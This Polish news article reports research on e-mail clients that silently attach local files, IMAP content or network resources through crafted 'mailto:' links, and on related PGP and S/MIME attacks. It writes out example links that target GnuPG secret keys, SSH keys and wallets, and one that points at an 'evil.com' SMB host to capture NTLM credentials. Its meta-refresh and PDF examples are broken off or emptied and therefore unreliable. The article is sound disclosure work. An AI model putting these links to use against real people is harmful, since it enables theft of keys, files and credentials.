Atak na użytkowników klientów poczty elektronicznej za pomocą linków «mailto:»

Badacze z Uniwersytetu Ruhr w Bochum (Niemcy) przeanalizowali (PDF) zachowanie klientów poczty elektronicznej przy przetwarzaniu linków „mailto:” z rozszerzonymi parametrami. Pięć z dwudziestu badanych klientów poczty elektronicznej okazało się podatnych na atak manipulujący podstawieniem zasobów za pomocą parametru „attach”. Sześciu kolejnych klientów poczty było podatnych na atak polegający na wymianie kluczy PGP i S/MIME, a trzech klientów okazało się podatnych na atak polegający na wydobywaniu treści zaszyfrowanych wiadomości.

Linki „mailto:” służą do automatyzacji otwierania klienta poczty w celu napisania wiadomości do adresata określonego w linku. Oprócz adresu w linku można podać dodatkowe parametry, takie jak temat wiadomości oraz szablon typowej treści. Proponowany atak manipuluje parametrem „attach”, który pozwala dołączyć załącznik do tworzonej wiadomości.

Klienci poczty elektronicznej Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) oraz Pegasus Mail okazali się podatni na trywialny atak, który umożliwia automatyczne dołączenie dowolnego lokalnego pliku wskazanego w linku w formacie „mailto:?attach=ścieżka_do_pliku”. Plik jest dołączany bez wyświetlania ostrzeżenia, więc bez specjalnego zwrócenia uwagi użytkownik może nie zauważyć, że wiadomość zostanie wysłana z załączonym plikiem.

Na przykład, za pomocą linku w formacie „mailto:?to=user@example.com&subject=Temat&body=Treść&attach=~/.gnupg/secring.gpg” można wstawić do wiadomości prywatne klucze GnuPG. Można także wysłać zawartość portfeli kryptograficznych (~/.bitcoin/wallet.dat), klucze SSH (~/.ssh/id_rsa) oraz wszelkie dostępne pliki dla użytkownika. Co więcej, Thunderbird pozwala dołączać grupy plików według maski za pomocą konstrukcji w stylu „attach=/tmp/*.txt”.

Oprócz lokalnych plików niektórzy klienci poczty obsługują linki do zasobów sieciowych oraz ścieżki na serwerze IMAP. W szczególności IBM Notes umożliwia przesyłanie pliku z katalogu sieciowego podczas przetwarzania linków w formacie „attach=\\evil.com\dummyfile”, a także przechwycenie parametrów uwierzytelniania NTLM wysyłając link do serwera SMB kontrolowanego przez atakującego (żądanie zostanie wysłane z bieżącymi parametrami uwierzytelniania użytkownika).

Thunderbird skutecznie obsługuje zapytania typu „attach=imap://fetch>UID>/INBOX>1/”, umożliwiające dołączenie treści z folderów na serwerze IMAP. Przy tym wiadomości pobierane z IMAP, które są szyfrowane przy użyciu OpenPGP i S/MIME, są automatycznie deszyfrowane przez klienta pocztowego przed wysyłką. Programiści Thunderbird poinformowani o problemie w lutym oraz w wydaniu Thunderbird 78 problem został już rozwiązany (gałęzie Thunderbird 52, 60 i 68 pozostają podatne).

Stare wersje Thunderbird okazały się również podatne na dwa inne rodzaje ataków na PGP i S/MIME zaproponowane przez badaczy. W szczególności atak zamiany kluczy zastosowano wobec Thunderbird, a także OutLook, PostBox, eM Client, MailMate i R2Mail2, ponieważ klient pocztowy automatycznie importuje i instaluje nowe certyfikaty przesyłane w wiadomościach S/MIME, co pozwala atakującemu na podmianę już zapisanych u użytkownika kluczy publicznych.

Drugi atak, na który narażone są Thunderbird, PostBox i MailMate, manipuluje cechami mechanizmu automatycznego zapisywania wersji roboczych wiadomości i umożliwia przy pomocy parametrów mailto inicjowanie deszyfrowania szyfrowanych wiadomości lub dodanie podpisu cyfrowego do dowolnych wiadomości, z późniejszym przesłaniem wyniku na serwer IMAP atakującego. Szyfrogram w tym ataku jest przesyłany za pomocą parametru „body”, a do inicjowania wywołania do serwera IMAP atakującego stosuje się znacznik „meta refresh”. Na przykład: ‘<meta http-equiv=

Aby automatycznie przetwarzać linki „mailto:” bez udziału użytkownika, mogą być stosowane specjalnie sformatowane dokumenty PDF – działanie OpenAction w PDF pozwala automatycznie uruchomić obsługę mailto po otwarciu dokumentu:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Atak na użytkowników klientów pocztowych przy pomocy linków "mailto:"

Źródło: opennet.ru

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster